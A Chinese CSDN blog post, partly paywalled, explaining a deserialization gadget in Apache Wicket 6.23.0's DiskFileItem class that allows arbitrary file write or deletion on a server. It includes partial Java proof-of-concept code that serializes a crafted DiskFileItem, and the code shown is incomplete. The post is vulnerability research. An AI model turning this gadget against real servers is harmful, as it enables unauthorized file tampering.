Apache Wicket 6.23.0 – Deserialization gadget

最新推荐文章于 2023-03-02 20:01:06 发布
VIP文章 最新推荐文章于 2023-03-02 20:01:06 发布
阅读量573 收藏
点赞数 1
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c0c0cf/article/details/52685172
版权



Apacge Wicket简介:

Wicket是一个Java 语言的Web开发框架,与Struts,WebWork,Tapestry   相类似。其特点在于对Html和代码进行了有效的分离(有利于程序员和美工的合作),基于规则的配置(减少了XML   等配置文件的使用),学习曲线较低(开发方式与C/S相似),更加易于调试(错误类型比较少,而且容易定位)。


摘要:

Apache Wichet6.23.0项目的反序列化漏洞,这个漏洞没有Common Collection library危害大但是找到它是非常有趣的。这个漏洞允许写入远程文件到服务器本地文件中或删除服务器上面的任意文件。这个漏洞跟CVE-2013-2186相似。Apacge Wichet开发者复制粘贴了 Common Upload组件中"DiskFileItem" 类。


要演示这种攻击,需要服务器反序列化这个对象(例如通过RMI端口),你需要设置在服务器可以写可读的位置(例如共享目录或Web服务器根目录下的目录)。


漏洞描述:

在Apache Wicket的项目的6.23.0版本的“DiskFileItem”类反序列化过程中允许任意的远程文件写入到服务器的本地文件。


首先攻击者序列化一个DiskFileItem对象

package com.serialise;

import org.apache.wicket.util.file.FileCleaner;
import org.apache.wicket.util.io.DeferredFileOutputStream;
import org.apache.wicket.util.upload.DiskFileItem;

import java.io.*;
import java.net.URI;

/**
 * Created by H4ck0rInj on 2016/9/27.
 */
public class Test{
 
   public static void main(String argv[]){
 
       try {
 
           String contentType = "UTF-8";
           boolean isFormField = true;
           String fileName = "test.txt";
           int sizeThreshold = 4;
           File repository = new File(new URI("file:///D:/HACK/"));
           FileCleaner fileUploadCleaner = new FileCleaner();
           DiskFileItem dfi =new DiskFileItem(fileName,contentType,isFormField,fileName,sizeThreshold,repository,fileUploadCleaner);

           DeferredFileOutputStream os = (DeferredFileOutputStream) dfi.getOutputStream();
           System.out.println(os.isThresholdExceeded());
           byte[] data = dfi.get();
           os.write(fileName.getBytes());
           FileOutputStream fos = new FileOutputStream("D:\\fileitem.ser");
           ObjectOutputStream oos = new ObjectOutputStream(fos);
           oos.writeObject(dfi);
       }catch (Exception e) {
 

       }
   }
}

然后攻击者将修改序列化对象。要修改的是要在红圈的地方将被复制的内容和内容要被复制的目录。它们都是Java File对象,所以他们能够支持URI参数。


这个Poc我们修改了原始的path和respository变量的指向。

System.out.println("Start");
FileInputStream fis = new FileInputStream("D:\\fileitem.ser");
ObjectInputStream ois = new ObjectInputStream(fis);
DiskFileItem nameFromDisk = (DiskFileItem)ois.readObject();
System.out.println("End");
fos.close();

最低0.47元/天 解锁文章
0c0c0f
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
apache wicket_教程 Apache Wicket:有趣的Web框架
06-30 1652
选择Java技术堆栈时,不乏多样性。 为了摆脱“滚动自己的(一切)”的想法,以至于很多公司都沦为猎物,而“一切都必须成为标准”的哲学,则对每一层都采取了各种各样的方法过去几年中,Java体系结构如雨后春笋般涌现。 UI层对于竞争技术的奋斗并不陌生。 有了提供的所有选项,您将如何选择? 尽管没有作家可以为您做出选择,但是我们可以做的是向您介绍您可能要考虑的另一种选择,希望它会引起您足够的兴趣并尝...
Spring Boot框架Whitelabel Error Page SpEL注入漏洞分析
c0c0cf的专栏
09-15 9236
微信公众号:DebugPwn 新浪微博:http://weibo.com/u/2275304001?refer_flag=1005055010_ SpEL Introduction The Spring Expression Language (SpEL for short) is a powerful expression language
Apache Wicket Cookbook.pdf
08-16
Table of Contents Preface 1 Chapter 1: Validating and Converting User Input 7 Introduction 7 Performing form-level custom validation 7 Creating a custom validator 12 Composing multiple validators into a single reusable validator 18 Converting string inputs to objects 23 Chapter 2: Getting Down and Dirty with Forms and Form Components 33 Introduction 33 Creating linked selectboxes 34 Composing multiple form components into a single reusable component 39 Preventing multiple form submits 45 Protecting against spam with a CAPTCHA 55 Chapter 3: Making Forms Presentable 61 Introduction 61 Changing form component CSS class on validation errors 62 Using FeedbackPanel to output form component specific messages 65 Streamlining form component presentation using behaviors 67 Chapter 4: Taking your Application Abroad 75 Introduction 75 Storing module resource strings in package properties 76 Retrieving a localized string 80 Feeding dynamic localized strings to components using StringResourceModel 84 Using wicket:message to output localized markup 86 Overriding localized resources on a case by case basis 89 ii Table of Contents Chapter 5: Displaying Data Using DataTable 95 Introduction 95 Sorting 96 Filtering 100 Making cells clickable 106 Making rows selectable with checkboxes 110 Exporting data to CSV 120 Chapter 6: Enhancing your UI with Tabs and Borders 129 Introduction 129 Creating tabs with dynamic titles 130 Making a tabbed panel play nice with forms 136 Creating a client-side JavaScript tabbed panel 140 Using borders to decorate components 143 Creating a collapsible border 148 Chapter 7: Deeper into Ajax 157 Introduction 157 Adding Ajax validation to individual form components 158 Blocking until an Ajax request is complete 162 Providing Ajax feedback automatically 168 Chapter 8: Visualizing Data with Charts 177 Introduction 177 Charting with Open Flash Chart 178 Feeding chart data using a SharedResource 191 Responding to clic
Web Security 之 Insecure deserialization
bluemoon_0的博客
01-14 99
Web Security 之 Insecure deserialization
为org.apache.wicket.util.resource启用调试消息
一名可爱的技术搬运工
05-24 169
问题 在Wicket中,当找不到html页面时,它将引发“ 为org.apache.wicket.util.resource启用调试消息以获取所有尝试过的文件名的列表 ”。 想知道如何为Wicket资源启用调试消息? Root cause: org.apache.wicket.markup.MarkupNotFoundException: Markup of type 'html' f...
深究Java Hibernate框架下的Deserialization
Jinmindong
03-02 652
Hibernate是一个开源免费的、基于 ORM 技术的 Java 持久化框架。通俗地说,Hibernate 是一个用来连接和操作数据库的 Java框架,它最大的优点是使用了 ORM 技术。Hibernate 支持几乎所有主流的关系型数据库,只要在配置文件中设置好当前正在使用的数据库,程序员就不需要操心不同数据库之间的差异。答案就这个类中类中存在一个方法将会遍历调用getters属性中的get方法我们看看getters属性是个啥。
apache wicket_您应该使用Apache Wicket的五个原因
专业的开发者“讨论”
07-10 545
apache wicket Apache Wicket是一个基于Java的Web开发框架。 我觉得它没有得到应有的关注。 在过去的6年中,我一直将Wicket专业用于现实世界的项目,并为之热心! 在本文中,让我们看一下应该考虑使用它的五个原因。 1.简单的状态管理 编写Wicket应用程序的开发经验与桌面开发非常相似。 有时您几乎会忘记HTTP的无状态本质。 这是因为在Wic...
java代码审计手书(四)
一个码农的笔记
11-29 7709
翻译自:http://find-sec-bugs.github.io/bugs.htm 翻译:聂心明 外部文件访问(Android) 漏洞特征:ANDROID_EXTERNAL_FILE_ACCESS 应用经常往外部存储上写数据(可能是SD卡),这个操作可能会有多个安全问题。首先应用可以可以通过READ_EXTERNAL_STORAGE 获取SD卡上存储的文件。而且如果数据中包含用户的敏感信息的话...
Apache Wicket Cookbook
10-26
Apache Wicket Cookbook
apache-wicket
08-30
Wicket has been around since 2004 and it has been an Apache project since 2007. During these years it has proved to be a solid and valuable solution for building enterprise web applications. Wicket ...
wicket-site:Apache Wicket网站的镜像
04-28
Wicket新网站 该存储库包含的站点。 项目信息 该站点基于 。 因此,您必须熟悉Markdown模板语言,并安装了Jekyll(3+版本)才能为该项目做出贡献。 运行项目 只需转到项目根文件夹并执行jekyll serve -w即可生成静态...
由%5c爆库漏洞研究的绝对路径,相对路径和虚拟目录
c0c0cf的专栏
03-19 3703
通常情况下,数据库连接文件中的server.mappath()方法,可以正常获得物理路径,但是在浏览器中的连接被修改提交后,网页的相对路径就发生了变化,重而使得路径报错,报出数据库信息. ie特性,在浏览器中提交的连接地址中包含\浏览器会自动把 \ 转换为 /,重而访问到正确的连接地址。但是对于/小小的编码转换,就可避免ie的自动转化 %5是\的十六进制编码,当iis服务器收到用户提交的信息并作
甲方安全工作二三事
c0c0cf的专栏
09-25 2146
观点:保证基础设施安全的情况下,甲方安全是需要围绕着业务开展的,一切需要为业务服务,脱离业务去做安全是脱离企业竞争原则的,安全越贴近业务越好。 熟悉组织架构 1、熟悉组织架构,因为在甲方大多数工作是需要业务方配合的。了解一个业务线适合的安全接口人,最好对安全感兴趣并且对该业务线产品非常熟悉的人。快速了解公司的一些安全产品,每个产品提供怎么样场景的安全服务,向业务推广。 2、熟悉安
CVE-2016-4977 RCE in Spring Security OAuth漏洞分析
c0c0cf的专栏
09-21 1932
新浪微博: http://weibo.com/u/2275304001/home?wvr=5 微信公众号 DebugPwn 漏洞描述: When processing authorization requests using the whitelabel views, the response_type parameter value was executed
Apache Mina 2.0.13 - Remote Command Execution
c0c0cf的专栏
09-23 840
新浪微博: http://weibo.com/u/2275304001/home?wvr=5 微信公众号 DebugPwn Apache Mina 2.0.13 - Remote Command Execution 2016-09-22 0c0c0f译 0c0c0f Apache Mina介绍: Apache Mina是一个能够帮助用户
2024-2030全球及中国PCB接触式探头行业研究及十五五规划分析报告.docx
最新发布
04-18
2024-2030全球及中国PCB接触式探头行业研究及十五五规划分析报告
springboot wicket
12-01
Spring Boot是一个用于快速开发Java应用程序的开源框架,它简化了应用程序的配置和部署过程。它提供了一个基于约定的开发模式,通过自动配置和起步依赖,开发人员可以快速构建可独立运行的、生产级别的Spring应用程序。 Wicket是一个基于Java的开源Web应用程序框架,它使用面向对象的编程模型,将HTML页面和Java代码紧密地结合在一起。Wicket提供了一种组件化的开发方式,开发人员可以通过创建可重用的组件来构建Web界面。Wicket还具备良好的可扩展性和易于维护的特点。 Spring Boot和Wicket可以很好地结合使用,通过Spring Boot提供的自动配置和快速开发能力,开发人员可以快速搭建起一个基于Wicket的Web应用程序。Wicket提供的组件化开发方式能够很好地与Spring Boot的开发模式相结合,使得开发人员可以更加方便地构建出灵活、可扩展的Web应用程序。 通过使用Spring Boot和Wicket,开发人员可以充分发挥两个框架的优势,快速构建出功能强大、易于维护的Web应用程序。同时,Spring Boot还提供了丰富的生态系统和社区支持,可以为开发人员提供更多的便利和解决方案。总之,Spring Boot结合Wicket,能够为开发人员带来更高的开发效率和更好的开发体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值